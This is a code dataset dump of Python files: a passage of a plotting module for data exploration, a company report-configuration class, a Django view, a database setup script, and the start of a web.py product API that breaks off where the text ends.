show_time_on_yaxis:\n index = pd.date_range(data.index[0], data.index[-1], periods=len(axis.get_yticks()))\n # formatting y-ticklabels\n index = [d.strftime('%Y-%m-%d') for d in index]\n axis.set_yticklabels(index, fontsize=\"18\")\n else:\n axis.set_yticklabels(axis.get_yticks(),\n fontsize=_kwargs['ytick_labels_fs'])\n axis.set_xticklabels(\n axis.get_xticklabels(),\n horizontalalignment=\"center\",\n fontweight=\"light\",\n fontsize=_kwargs['xtick_labels_fs'],\n )\n axis.tick_params(length=1, colors=\"#111111\")\n axis.set_ylabel(\"Examples\", fontsize=\"24\")\n for _, spine in axis.spines.items():\n spine.set_visible(True)\n spine.set_color(spine_color)\n if title is not None:\n axis.set_title(title, fontsize=title_fs)\n\n return self.save_or_show(save=save, fname=fname+'_heat_map', where='data', dpi=500)\n\n def plot_missing(self, save:bool=True, 
cols=None, **kwargs):\n        \"\"\"\n        cols: columns to be used.\n        save: if False, the plot will be shown and not saved.\n        Examples:\n        >>>vis = Visualizations(data)\n        >>>vis.plot_missing(save=False)\n        \"\"\"\n        if isinstance(self.data, pd.DataFrame):\n            self.plot_missing_df(self.data, cols=cols, save=save, **kwargs)\n\n        elif isinstance(self.data, list):\n            for idx, data in enumerate(self.data):\n                _cols = cols[idx] if isinstance(cols, list) else None\n                self.plot_missing_df(data, cols=_cols, fname=str(idx), save=save, **kwargs)\n\n        elif isinstance(self.data, dict):\n            for data_name, data in self.data.items():\n                if isinstance(data, pd.DataFrame):\n                    _cols = cols[data_name] if cols else None\n                    self.plot_missing_df(data, cols=_cols, fname=data_name, save=save, **kwargs)\n        return\n\n    def plot_missing_df(self,\n                        data:pd.DataFrame,\n                        cols=None,\n                        fname:str='',\n                        save:bool=True,\n                        **kwargs):\n        \"\"\"\n        kwargs:\n            xtick_labels_fs\n            ytick_labels_fs\n            figsize\n            any other keyword argument will be passed to sns.barplot()\n        \"\"\"\n        if cols is None:\n            cols = data.columns\n        data = data[cols]\n        # Identify missing values\n        mv_total, mv_rows, mv_cols, _, mv_cols_ratio = _missing_vals(data).values()\n\n        _kwargs = {\n            \"xtick_labels_fs\": 12,\n            \"ytick_labels_fs\": 20,\n            \"figsize\": (5 + len(cols)*0.25, 10 + len(cols)*0.1),\n        }\n        for k in _kwargs.keys():\n            if k in kwargs:\n                _kwargs[k] = kwargs.pop(k)\n        if mv_total < 6:\n            print(\"Fewer than 6 missing values found in the dataset; skipping the plot.\")\n        else:\n            # Create figure and axes\n            plt.close('all')\n            fig = plt.figure(figsize=_kwargs['figsize'])\n            gs = fig.add_gridspec(nrows=1, ncols=1, left=0.1, wspace=0.05)\n            ax1 = fig.add_subplot(gs[:1, :5])\n\n            # ax1 - Barplot\n            ax1 = sns.barplot(x=list(data.columns), y=np.round(mv_cols_ratio * 100, 2), ax=ax1, **kwargs)\n\n            ax1.set(frame_on=True, xlim=(-0.5, len(mv_cols) - 0.5))\n            ax1.set_ylim(0, np.max(mv_cols_ratio) * 100)\n            ax1.grid(linestyle=\":\", linewidth=1)\n\n            ax1.set_yticklabels(ax1.get_yticks(), fontsize=\"18\")\n            ax1.yaxis.set_major_formatter(ticker.FormatStrFormatter('%.1f'))\n            ax1.set_ylabel(\"Missing Percentage\", fontsize=_kwargs['ytick_labels_fs'])\n\n            ax1.set_xticklabels(\n                ax1.get_xticklabels(),\n                horizontalalignment=\"center\",\n                fontweight=\"light\",\n                rotation=90,\n                fontsize=_kwargs['xtick_labels_fs'],\n            )\n            ax1.tick_params(axis=\"y\", colors=\"#111111\", length=1)\n\n            # annotate missing values on top of the bars\n            for rect, label in zip(ax1.patches, mv_cols):\n                height = rect.get_height()\n                ax1.text(\n                    0.1 + rect.get_x() + rect.get_width() / 2,\n                    height + height*0.02,\n                    label,\n                    ha=\"center\",\n                    va=\"bottom\",\n                    rotation=\"90\",\n                    alpha=0.5,\n                    fontsize=\"11\",\n                )\n            self.save_or_show(save=save, fname=fname+'_missing_vals', where='data', dpi=500)\n        return\n\n    def plot_histograms(self, save=True, cols=None, **kwargs):\n        \"\"\"Plots the distribution of the data as histograms.\n        kwargs: https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.hist.html\n        \"\"\"\n        if isinstance(self.data, pd.DataFrame):\n            self.plot_his_df(self.data, save=save, cols=cols, **kwargs)\n\n        elif isinstance(self.data, list):\n            for idx, data in enumerate(self.data):\n                self.plot_his_df(data, prefix=str(idx), cols=cols, save=save, **kwargs)\n\n        elif isinstance(self.data, dict):\n            for data_name, data in self.data.items():\n                if isinstance(data, pd.DataFrame):\n                    self.plot_his_df(data, prefix=data_name, save=save, **kwargs)\n        return\n\n    def plot_his_df(self, data:pd.DataFrame, prefix='', cols=None, save=True, bins=100, figsize=(20, 14), **kwargs):\n        if cols is 
None:\n            cols = data.columns\n        data[cols].hist(bins=bins, figsize=figsize, **kwargs)\n        self.save_or_show(fname=f\"hist_{prefix}\", save=save, where='data')\n        return\n\n    def feature_feature_corr(self, cols=None, remove_targets=True, save=True, **kwargs):\n        \"\"\"\n        >>>from AI4Water.utils.visualizations import Visualizations\n        >>>vis = Visualizations(data)\n        >>>vis.feature_feature_corr(save=False)\n        \"\"\"\n        if cols is None:\n            cols = self.in_cols if remove_targets else self.in_cols + self.out_cols\n            if isinstance(cols, dict):\n                cols = None\n\n        if isinstance(self.data, pd.DataFrame):\n            self.feature_feature_corr_df(self.data, cols, save=save, **kwargs)\n\n        elif isinstance(self.data, list):\n            for idx, data in enumerate(self.data):\n                if isinstance(data, pd.DataFrame):\n                    self.feature_feature_corr_df(data, cols[idx] if cols is not None else None,\n                                                 prefix=str(idx), save=save, **kwargs)\n\n        elif isinstance(self.data, dict):\n            for data_name, data in self.data.items():\n                if isinstance(data, pd.DataFrame):\n                    self.feature_feature_corr_df(data, cols, prefix=data_name, save=save, **kwargs)\n        return\n\n    def feature_feature_corr_df(self,\n                                data,\n                                cols=None,\n                                prefix='',\n                                save=True,\n                                split=None,\n                                threshold=0,\n                                method='pearson',\n                                **kwargs):\n        \"\"\"\n        split : Optional[str], optional\n            Type of split to be performed {None, \"pos\", \"neg\", \"high\", \"low\"}, by default None\n        method : str, optional\n            {\"pearson\", \"spearman\", \"kendall\"}, by default \"pearson\"\n\n        kwargs\n          * vmax: float, default is calculated from the given correlation \\\n            coefficients.\n            Value between -1 or vmin <= vmax <= 1, limits the range of the cbar.\n          * vmin: float, default is calculated from the given correlation \\\n            coefficients.\n            Value between -1 <= vmin <= 1 or vmax, limits the range of the cbar.\n        To plot positive correlations only:\n        feature_feature_corr_df(model.data, list(model.data.columns), split=\"pos\")\n        To plot negative correlations only:\n        feature_feature_corr_df(model.data, list(model.data.columns), split=\"neg\")\n        \"\"\"\n        plt.close('all')\n\n        if cols is None:\n            cols = data.columns\n\n        corr = data[cols].corr(method=method)\n\n        if split == \"pos\":\n            corr = corr.where((corr >= threshold) & (corr > 0))\n        elif split == \"neg\":\n            corr = corr.where((corr <= threshold) & (corr < 0))\n\n        mask = np.zeros_like(corr, dtype=bool)\n\n        vmax = np.round(np.nanmax(corr.where(~mask)) - 0.05, 2)\n        vmin = np.round(np.nanmin(corr.where(~mask)) + 0.05, 2)\n        # width x height\n        fig, ax = plt.subplots(figsize=kwargs.get('figsize', (5 + len(cols)*0.25, 9 + len(cols)*0.1)))\n\n        _kwargs = dict()\n        _kwargs['annot'] = kwargs.get('annot', True if len(cols) <= 20 else False)\n        _kwargs['cmap'] = kwargs.get('cmap', \"BrBG\")\n        _kwargs['vmax'] = kwargs.get('vmax', vmax)\n        _kwargs['vmin'] = kwargs.get('vmin', vmin)\n        _kwargs['linewidths'] = kwargs.get('linewidths', 0.5)\n        _kwargs['annot_kws'] = kwargs.get('annot_kws', {\"size\": 10})\n        _kwargs['cbar_kws'] = kwargs.get('cbar_kws', {\"shrink\": 0.95, \"aspect\": 30})\n\n        ax = sns.heatmap(corr, center=0, fmt=\".2f\", ax=ax, **_kwargs)\n        ax.set(frame_on=True)\n        self.save_or_show(save, fname=f\"{split if split else ''}_feature_corr_{prefix}\", where=\"data\")\n        return\n\n    def grouped_scatter(self, inputs=True, outputs=True, cols=None, save=True, max_subplots=8, **kwargs):\n\n        fname = \"scatter_plot_\"\n\n        if cols is None:\n            cols = []\n\n            if inputs:\n                cols += self.in_cols\n                fname += \"inputs_\"\n            if outputs:\n                fname += \"outputs_\"\n        else:\n            assert isinstance(cols, list)\n\n        if 
isinstance(self.data, pd.DataFrame):\n            self.grouped_scatter_plot_df(self.data[cols], max_subplots, save, **kwargs)\n\n        elif isinstance(self.data, list):\n            for idx, data in enumerate(self.data):\n                if isinstance(data, pd.DataFrame):\n                    _cols = cols + [self.out_cols[idx]] if outputs else cols\n                    self.grouped_scatter_plot_df(data[_cols], max_subplots, save=save, prefix=str(idx), **kwargs)\n\n        elif isinstance(self.data, dict):\n            for data_name, data in self.data.items():\n                if isinstance(data, pd.DataFrame):\n                    self.grouped_scatter_plot_df(data, max_subplots, save=save, prefix=data_name,\n                                                 **kwargs)\n        return\n\n    def grouped_scatter_plot_df(self, data:pd.DataFrame, max_subplots:int=10, save=True, prefix='', **kwargs):\n        \"\"\"\n        max_subplots: int, can be set to a large number to show all the scatter plots on one axis.\n        \"\"\"\n        data = data.copy()\n        if data.shape[1] <= max_subplots:\n            self._grouped_scatter_plot(data, save=save, name=f'grouped_scatter_{prefix}', **kwargs)\n        else:\n            tot_plots = find_tot_plots(data.shape[1], max_subplots)\n            for i in range(len(tot_plots) - 1):\n                st, en = tot_plots[i], tot_plots[i + 1]\n                sub_df = data.iloc[:, st:en]\n                self._grouped_scatter_plot(sub_df, save=save, name=f'grouped_scatter_{prefix}_{st}_{en}', **kwargs)\n        return\n\n    def _grouped_scatter_plot(self, df, save=True, name='grouped_scatter', **kwargs):\n        plt.close('all')\n        sns.set()\n        sns.pairplot(df, height=2.5, **kwargs)\n        self.save_or_show(fname=name, save=save, where='data')\n        return\n\n    def plot_pcs(self, num_pcs=None, save=True, save_as_csv=False, figsize=(12, 8), **kwargs):\n        \"\"\"Plots principal components.\n        kwargs will go to sns.pairplot.\"\"\"\n        if isinstance(self.data, list):\n            for idx, data in enumerate(self.data):\n                self._plot_pcs(data[self.in_cols],\n                               num_pcs, save=save, prefix=str(idx), save_as_csv=save_as_csv,\n                               hue=self.out_cols[idx], figsize=figsize, **kwargs)\n\n        elif isinstance(self.data, dict):\n            for data_name, data in self.data.items():\n                self._plot_pcs(data[self.in_cols], num_pcs, save=save, prefix=data_name, save_as_csv=save_as_csv,\n                               hue=self.out_cols,\n                               figsize=figsize, **kwargs)\n        else:\n            self._plot_pcs(self.data[self.in_cols], num_pcs, save=save, save_as_csv=save_as_csv, hue=self.out_cols,\n                           figsize=figsize, **kwargs)\n        return\n\n    def _plot_pcs(self, data, num_pcs, save=True, prefix='', save_as_csv=False, hue=None, figsize=(12,8), **kwargs):\n\n        if num_pcs is None:\n            num_pcs = int(data.shape[1]/2)\n\n        #df_pca = data[self.in_cols]\n        #pca = PCA(n_components=num_pcs).fit(df_pca)\n        #df_pca = pd.DataFrame(pca.transform(df_pca))\n\n        transformer = Transformations(data=data, method='pca', n_components=num_pcs, replace_nans=True)\n        df_pca = transformer.transform()\n\n        pcs = ['pc' + str(i + 1) for i in range(num_pcs)]\n        df_pca.columns = pcs\n\n        if hue is not None:\n            if isinstance(hue, list):\n                hue = hue[0]\n            if hue in data:\n                df_pca[hue] = data[hue]\n\n                if df_pca[hue].isna().sum() > 0: # output column contains nans, so don't use it as hue.\n                    hue = None\n            else: # ignore it\n                hue = None\n\n        if save_as_csv:\n            df_pca.to_csv(os.path.join(self.path, \"data\", f\"first_{num_pcs}_pcs_{prefix}\"))\n\n        plt.close('all')\n        plt.figure(figsize=figsize)\n        sns.pairplot(data=df_pca, vars=pcs, hue=hue, **kwargs)\n        self.save_or_show(fname=f\"first_{num_pcs}_pcs_{prefix}\", save=save, where='data')\n        return\n\n    def plot_data(self, save=True, freq=None, cols=None, max_subplots=10, **kwargs):\n        \"\"\"\n        :param save:\n        :param max_subplots: int, number of subplots within one plot. 
Each feature will be shown in a separate subplot.\n :param kwargs: https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.plot.html\n :param freq: str, one of 'daily', 'weekly', 'monthly', 'yearly', determines interval of plot of data. It is\n valid for only time-series data.\n :param cols: columns in self.data to plot\n :return:\n\n ------\n examples:\n\n >>>model.plot_data(subplots=True, figsize=(12, 14), sharex=True)\n >>>model.plot_data(freq='monthly', subplots=True, figsize=(12, 14), sharex=True)\n \"\"\"\n # TODO, this method should be available from `model` as well\n if isinstance(self.data, pd.DataFrame):\n self.plot_df(self.data, cols=cols, save=save, freq=freq, max_subplots=max_subplots, **kwargs)\n\n if isinstance(self.data, list):\n for idx, data in enumerate(self.data):\n self.plot_df(data, cols=cols[idx] if isinstance(cols, list) else None,\n save=save, freq=freq, prefix=str(idx), max_subplots=max_subplots, **kwargs)\n elif isinstance(self.data, dict):\n for data_name, data in self.data.items():\n if isinstance(data, pd.DataFrame):\n self.plot_df(data, cols=cols, prefix=data_name, save=save, freq=freq, max_subplots=max_subplots,\n **kwargs)\n return\n\n def plot_df(self, df, cols=None, save=True, freq=None, max_subplots=10,\n prefix='',\n leg_kws=None,\n label_kws=None,\n tick_kws=None,\n **kwargs):\n \"\"\"Plots each columns of dataframe and saves it if `save` is True.\n max_subplots: determines how many sub_plots are to be plotted within one plot. If dataframe contains columns\n greater than max_subplots, a separate plot will be generated for remaining columns.\n \"\"\"\n assert isinstance(df, pd.DataFrame)\n if leg_kws is None:\n leg_kws = {'fontsize': 14}\n if label_kws is None:\n label_kws = {'fontsize': 14}\n if tick_kws is None:\n tick_kws = {'axis':\"both\", 'which':'major', 'labelsize':12}\n\n if cols is None:\n cols = list(df.columns)\n df = df[cols]\n\n if df.shape[1] <= max_subplots:\n\n if freq is None:\n kwargs = plot_style(df, **kwargs)\n axis = df.plot(**kwargs)\n if isinstance(axis, np.ndarray):\n for ax in axis:\n set_axis_paras(ax, leg_kws, label_kws, tick_kws)\n else:\n set_axis_paras(axis, leg_kws, label_kws, tick_kws)\n\n self.save_or_show(save=save, fname=f\"input_{prefix}\", where='data')\n else:\n self.plot_df_with_freq(df, freq, save, **kwargs)\n else:\n tot_plots = find_tot_plots(df.shape[1], max_subplots)\n\n for i in range(len(tot_plots) - 1):\n st, en = tot_plots[i], tot_plots[i + 1]\n sub_df = df.iloc[:, st:en]\n\n if freq is None:\n kwargs = plot_style(sub_df, **kwargs)\n axis = sub_df.plot(**kwargs)\n for ax in axis:\n ax.legend(**leg_kws)\n ax.set_ylabel(ax.get_ylabel(), **label_kws)\n ax.set_xlabel(ax.get_xlabel(), **label_kws)\n ax.tick_params(**tick_kws)\n self.save_or_show(save=save, fname=f'input_{prefix}_{st}_{en}', where='data')\n else:\n self.plot_df_with_freq(sub_df, freq, save, prefix=f'{prefix}_{st}_{en}', **kwargs)\n return\n\n def plot_df_with_freq(self, df:pd.DataFrame, freq:str, save:bool=True, prefix:str='', **kwargs):\n \"\"\"Plots a dataframe which has data as time-series and its index is pd.DatetimeIndex\"\"\"\n\n validate_freq(df, freq)\n\n st_year = df.index[0].year\n en_year = df.index[-1].year\n\n for yr in range(st_year, en_year + 1):\n\n _df = df[df.index.year == yr]\n\n if freq == 'yearly':\n kwargs = plot_style(_df, **kwargs)\n _df.plot(**kwargs)\n self.save_or_show(save=save, fname=f'input_{prefix}_{str(yr)}', where='data')\n\n elif freq == 'monthly':\n st_mon = _df.index[0].month\n en_mon = 
_df.index[-1].month\n\n                for mon in range(st_mon, en_mon+1):\n\n                    __df = _df[_df.index.month == mon]\n                    kwargs = plot_style(__df, **kwargs)\n                    __df.plot(**kwargs)\n                    self.save_or_show(save=save, fname=f'input_{prefix}_{str(yr)}_{str(mon)}', where='data/monthly')\n\n            elif freq == 'weekly':\n                st_week = _df.index[0].isocalendar()[1]\n                en_week = _df.index[-1].isocalendar()[1]\n\n                for week in range(st_week, en_week+1):\n                    __df = _df[_df.index.week == week]\n                    kwargs = plot_style(__df, **kwargs)\n                    __df.plot(**kwargs)\n                    self.save_or_show(save=save, fname=f'input_{prefix}_{str(yr)}_{str(week)}', where='data/weekly')\n        return\n\n\ndef set_axis_paras(axis, leg_kws, label_kws, tick_kws):\n    axis.legend(**leg_kws)\n    axis.set_ylabel(axis.get_ylabel(), **label_kws)\n    axis.set_xlabel(axis.get_xlabel(), **label_kws)\n    axis.tick_params(**tick_kws)\n    return\n\n\ndef plot_style(df:pd.DataFrame, **kwargs):\n    if 'style' not in kwargs and df.isna().sum().sum() > 0:\n        kwargs['style'] = ['.' for _ in range(df.shape[1])]\n    return kwargs\n\n\ndef validate_freq(df, freq):\n    assert isinstance(df.index, pd.DatetimeIndex), \"index of dataframe must be pandas DatetimeIndex\"\n    assert freq in [\"weekly\", \"monthly\",\n                    \"yearly\"], f\"freq must be one of {'weekly', 'monthly', 'yearly'} but it is {freq}\"\n    return\n\n\ndef regplot(true, pred, **kwargs):\n    \"\"\"\n    :param true: array like\n    :param pred: array like\n    Following kwargs are allowed:\n        figsize: tuple\n        colorbar: for plt.colorbar\n        cmap: for plt.scatter\n        s: for plt.scatter\n    :Note: This function will neither show nor save the plot. The user has to do that manually\n    after calling this function, as shown below.\n    >>>from AI4Water.utils.visualizations import regplot\n    >>>import numpy as np\n    >>>true = np.random.random(100)\n    >>>pred = np.random.random(100)\n    >>>regplot(true, pred)\n    >>>plt.show()\n    \"\"\"\n    # https://seaborn.pydata.org/generated/seaborn.regplot.html\n    if any([isinstance(true, _type) for _type in [pd.DataFrame, pd.Series]]):\n        true = true.values.reshape(-1,)\n    if any([isinstance(pred, _type) for _type in [pd.DataFrame, pd.Series]]):\n        pred = pred.values.reshape(-1,)\n\n    plt.close('all')\n\n    s = kwargs.get('s', 20)\n    cmap = kwargs.get('cmap', 'winter')  # https://matplotlib.org/stable/tutorials/colors/colormaps.html\n    figsize = kwargs.get('figsize', (8, 5.5))\n\n    plt.figure(figsize=figsize)\n    points = plt.scatter(true, pred, c=pred, s=s, cmap=cmap)  # set style options\n\n    if kwargs.get('annotate', True):\n        plt.annotate(f'$R^{2}$: {round(RegressionMetrics(true, pred).r2(), 3)}', xy=(0.50, 0.95), xycoords='axes fraction',\n                     horizontalalignment='right', verticalalignment='top', fontsize=16)\n\n    if kwargs.get('colorbar', False):\n        plt.colorbar(points)\n\n    sns.regplot(x=true, y=pred, scatter=False, color=\".1\")\n    plt.xlabel('Observed', fontsize=14)\n    plt.ylabel('Predicted', fontsize=14)\n\n    return","sub_path":"AI4Water/utils/visualizations.py","file_name":"visualizations.py","file_ext":"py","file_size_in_byte":48550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"471771720","text":"from __future__ import annotations\n\nimport json\n\nfrom models import ReportAction, ReportTarget, ReportTaskType\nfrom typing import Dict, List, Optional, Union\n\nclass CompanyConfiguration:\n    class Metadata:\n        schema: str\n        display_name: str\n        currency: str\n\n        def __init__(self, configuration: Dict[str, any]):\n            self.schema = configuration['schema']\n            self.display_name = configuration['display_name']\n            self.currency = 
configuration['currency']\n \n @property\n def as_dict(self) -> Dict[str, any]:\n return {\n 'schema': self.schema,\n 'display_name': self.display_name,\n 'currency': self.currency\n }\n \n class Product:\n identifier: str\n display_name: str\n platform_ids: Dict[str, any]\n\n def __init__(self, identifier: str, configuration: Dict[str, any]):\n self.identifier = identifier\n self.display_name = configuration['display_name']\n self.platform_ids = configuration['platform_ids']\n \n @property\n def as_dict(self) -> Dict[str, any]:\n return {\n 'display_name': self.display_name,\n 'platform_ids': self.platform_ids,\n }\n \n class TaskSet:\n identifier: str\n config: Dict[str, any]\n action: ReportAction\n target: ReportTarget\n products: List[CompanyConfiguration.Product]\n credentials_key: Optional[str]\n company_metadata: CompanyConfiguration.Metadata\n task_types: List[ReportTaskType]\n\n def __init__(self, identifier: str, configuration: Dict[str, any], products_context: Dict[str, CompanyConfiguration.Product], company_metadata: CompanyConfiguration.Metadata):\n self.identifier = identifier\n self.config = configuration\n self.action = ReportAction(configuration['action'])\n self.target = ReportTarget(configuration['target'])\n self.products = [\n products_context[i] for i in configuration['product_identifiers']\n ] if 'product_identifiers' in configuration else []\n self.credentials_key = configuration['credentials_key'] if 'credentials_key' in configuration else None\n self.company_metadata = company_metadata\n self.task_types = [ReportTaskType(t) for t in configuration['task_types']]\n\n @property\n def as_dict(self) -> Dict[str, any]:\n return {\n **self.config,\n 'task_types': [t.value for t in self.task_types],\n 'product_identifiers': [p.identifier for p in self.products],\n 'credentials_key': self.credentials_key if self.credentials_key else None,\n }\n\n @property\n def task_type_identifiers(self) -> List[str]:\n return list(sorted({t.value for t in self.task_types}))\n\n def filtered(self, task_types_filter: Optional[List[ReportTaskType]]=None, products_filter: Optional[List[str]]=None) -> CompanyConfiguration.TaskSet:\n filtered = CompanyConfiguration.TaskSet(\n identifier=self.identifier,\n configuration=self.as_dict,\n products_context={p.identifier: p for p in self.products},\n company_metadata=self.company_metadata\n )\n if task_types_filter is not None:\n filtered.task_types = [t for t in filtered.task_types if t in task_types_filter]\n if products_filter is not None:\n filtered.products = [p for p in filtered.products if p.identifier in products_filter]\n return filtered\n\n def product_for_platform_id(self, platform_id: str) -> Optional[CompanyConfiguration.Product]:\n products = {p for p in self.products if platform_id in {str(i) for i in p.platform_ids.values()}}\n if len(products) > 1:\n raise ValueError(f'Multiple products matched by platform ID {platform_id}', products)\n return next(iter(products)) if products else None\n\n # ----------------------------\n # class CompanyConfiguration:\n # ----------------------------\n identifier: str\n metadata: CompanyConfiguration.Metadata\n _products: Dict[str, Product]\n _task_sets: Dict[str, TaskSet]\n\n @classmethod\n def from_legacy(cls, identifier, legacy_configuration: Dict[str, any]) -> CompanyConfiguration:\n configuration = {\n 'company_metadata': legacy_configuration['company_metadata'],\n 'products': legacy_configuration['products'],\n 'task_sets': {},\n }\n action_configs = legacy_configuration['actions']\n for 
action_key, action_configs in action_configs.items():\n for target, target_configs in action_configs['targets'].items():\n for task_set_identifier, task_set_config in target_configs['task_sets'].items():\n configuration['task_sets'][f'{action_key}_{target}_{task_set_identifier}'] = {\n **task_set_config,\n 'identifier': f'{action_key}_{target}_{task_set_identifier}',\n 'action': action_key,\n 'target': target,\n }\n return cls(identifier=identifier, configuration=configuration)\n\n def __init__(self, identifier: str, configuration: Dict[str, any]):\n self.identifier = identifier\n company_metadata = {\n 'schema': self.identifier,\n **configuration['company_metadata'],\n }\n self.metadata = CompanyConfiguration.Metadata(configuration=company_metadata)\n\n products_config = configuration['products']\n self._products = {\n i: CompanyConfiguration.Product(identifier=i, configuration=products_config[i])\n for i in products_config.keys()\n }\n \n self._task_sets = {\n task_set_identifier: CompanyConfiguration.TaskSet(\n identifier=task_set_identifier,\n configuration=task_set_config,\n products_context=self._products,\n company_metadata=self.metadata\n ) for task_set_identifier, task_set_config in configuration['task_sets'].items()\n }\n\n @property\n def products(self) -> List[CompanyConfiguration.Product]:\n return [self._products[i] for i in sorted(self._products.keys())]\n\n @property\n def task_sets(self) -> List[CompanyConfiguration.TaskSet]:\n return [self._task_sets[i] for i in sorted(self._task_sets.keys())]\n\n @property\n def product_identifiers(self) -> List[str]:\n return [p.identifier for p in self.products]\n\n @property\n def task_set_identifiers(self) -> List[str]:\n return [t.identifier for t in self.task_sets]\n\n @property\n def action_identifiers(self) -> List[str]:\n return list(sorted({t.action.value for t in self.task_sets}))\n\n @property\n def target_identifiers(self) -> List[str]:\n return list(sorted({t.target.value for t in self.task_sets}))\n\n @property\n def task_type_identifiers(self) -> List[str]:\n return list(sorted({v for t in self.task_sets for v in t.task_type_identifiers}))\n\n @property\n def as_dict(self) -> Dict[str, any]:\n return {\n 'company_metadata': self.metadata.as_dict,\n 'products': {p.identifier: p.as_dict for p in self.products},\n 'task_sets': {t.identifier: t.as_dict for t in self.task_sets}\n }\n\n def filtered(self, actions_filter: Optional[List[ReportAction]]=None, targets_filter: Optional[List[ReportTarget]]=None, task_sets_filter: Optional[List[str]]=None, task_types_filter: Optional[List[ReportTaskType]]=None) -> CompanyConfiguration:\n filtered = CompanyConfiguration(identifier=self.identifier, configuration=self.as_dict)\n\n if actions_filter is not None:\n filtered._task_sets = {s.identifier: s for s in filtered.task_sets if s.action in actions_filter}\n if targets_filter is not None:\n filtered._task_sets = {s.identifier: s for s in filtered.task_sets if s.target in targets_filter}\n if task_sets_filter is not None:\n filtered._task_sets = {s.identifier: s for s in filtered.task_sets if s.identifier in task_sets_filter}\n\n filtered._task_sets = {s.identifier: s.filtered(task_types_filter=task_types_filter) for s in filtered.task_sets}\n filtered._task_sets = {i: s for i, s in filtered._task_sets.items() if s.task_types}\n return filtered\n\nclass CompanyConfigurations:\n _configs: Dict[str, CompanyConfiguration]\n\n def __init__(self, configuration: Dict[str, any]):\n if 'legacy' in configuration and configuration['legacy']:\n 
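# NOTE (illustrative comment; the keys 'report', 'email' and 'daily' below are invented for the example):\n            # legacy payloads nest task sets under actions -> targets, e.g.\n            #     {'actions': {'report': {'targets': {'email': {'task_sets': {'daily': {...}}}}}}}\n            # and CompanyConfiguration.from_legacy() above flattens that into a single\n            # 'task_sets' mapping keyed '{action}_{target}_{task_set}', e.g. 'report_email_daily'.\n            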
del configuration['legacy']\n self._configs = {i: CompanyConfiguration.from_legacy(identifier=i, legacy_configuration=configuration[i]) for i in configuration.keys()}\n else:\n self._configs = {i: CompanyConfiguration(identifier=i, configuration=configuration[i]) for i in configuration.keys()}\n\n @classmethod\n def for_schema(cls, schema: str) -> CompanyConfigurations:\n config = {\n schema: {\n 'company_metadata': {\n 'currency': '',\n 'display_name': '',\n },\n 'products': {},\n 'task_sets': {},\n }\n }\n return cls(configuration=config)\n\n @classmethod\n def from_legacy_json(cls, legacy_json: str) -> CompanyConfigurations:\n return cls(configuration={'legacy': True, **json.loads(legacy_json)})\n\n @classmethod\n def from_json(cls, data: str):\n data = json.loads(data)\n return CompanyConfigurations(configuration=data)\n\n @classmethod\n def from_sql(cls, schema: str):\n pass\n\n @property\n def configs(self) -> List[CompanyConfiguration]:\n return [self._configs[i] for i in sorted(self._configs.keys())]\n\n @property\n def company_identifiers(self) -> List[str]:\n return [c.identifier for c in self.configs]\n\n @property\n def product_identifiers(self) -> List[str]:\n return list(sorted({p for c in self.configs for p in c.product_identifiers}))\n\n @property\n def task_set_identifiers(self) -> List[str]:\n return list(sorted({t for c in self.configs for t in c.task_set_identifiers}))\n\n @property\n def action_identifiers(self) -> List[str]:\n return list(sorted({a for c in self.configs for a in c.action_identifiers}))\n\n @property\n def target_identifiers(self) -> List[str]:\n return list(sorted({t for c in self.configs for t in c.target_identifiers}))\n\n @property\n def task_type_identifiers(self) -> List[str]:\n return list(sorted({t for c in self.configs for t in c.task_type_identifiers}))\n \n def filtered(self, companies_filter: Optional[List[str]]=None, actions_filter: Optional[List[ReportAction]]=None, targets_filter: Optional[List[ReportTarget]]=None, task_sets_filter: Optional[List[str]]=None, task_types_filter: Optional[List[ReportTaskType]]=None) -> CompanyConfigurations:\n filtered = CompanyConfigurations(configuration=self.as_dict)\n if companies_filter is not None:\n filtered._configs = {c.identifier: c for c in filtered.configs if c.identifier in companies_filter}\n filtered._configs = {\n c.identifier: c.filtered(\n actions_filter=actions_filter,\n targets_filter=targets_filter,\n task_sets_filter=task_sets_filter,\n task_types_filter=task_types_filter\n )\n for c in filtered.configs\n }\n return filtered\n\n def as_sql(self, schema: str):\n pass\n\n @property\n def as_json(self) -> str:\n return json.dumps(self.as_dict, sort_keys=True, indent=2)\n\n @property\n def as_dict(self) -> Dict[str, any]:\n return { c.identifier: c.as_dict for c in self.configs }","sub_path":"config/company_configuration.py","file_name":"company_configuration.py","file_ext":"py","file_size_in_byte":10954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"522269924","text":"from django.template import RequestContext\nfrom django.shortcuts import render_to_response\nfrom Gammu.models import Inbox, SentItems\n# Create your views here.\ndef home(request):\n sent_items = SentItems.objects.all()\n inbox = Inbox.objects.all()\n return render_to_response('UjuServer/home.html',\n {'sent_items':sent_items,'inbox':inbox,},\n context_instance=RequestContext(request)\n 
)\n","sub_path":"UjuServer/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"221454941","text":"import os\nimport sys\n\n# Required for relative imports to also work when called\n# from project root directory.\nsys.path.append(os.path.dirname(__file__))\nfrom database_utils import execute_file\n\nCREATE_TABLE_SQL = 'BAG_create_table.sql'\n\ndef main():\n\tfolder = os.path.dirname(os.path.realpath(__file__))\n\tpath = os.path.join(folder, CREATE_TABLE_SQL)\n\texecute_file(path)\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"utils/BAG_create_table.py","file_name":"BAG_create_table.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"137798622","text":"import web\nimport json\nfrom data.security import *\nfrom data.dataAccess import *\nfrom data.product import *\nfrom factory.product import *\nfrom logger.logger import *\nfrom httpError import *\n\nclass ProductTypeList:\n\tdef GET(self):\n\t\tif authAdmin(web.ctx.env.get('HTTP_AUTHORIZATION')):\n\t\t\tresults = query(\"select * from Tejuana.Product_Type\")\n\t\t\treturn productTypeListFactory(results)\n\nclass ProductSupplies:\n\tdef GET(self):\n\t\tif authAdmin(web.ctx.env.get('HTTP_AUTHORIZATION')):\n\t\t\tresults = query(\"select * from Tejuana.ProductSuppliesList\")\n\t\t\treturn productSuppliesListFactory(results)\n\nclass Tags:\n\tdef 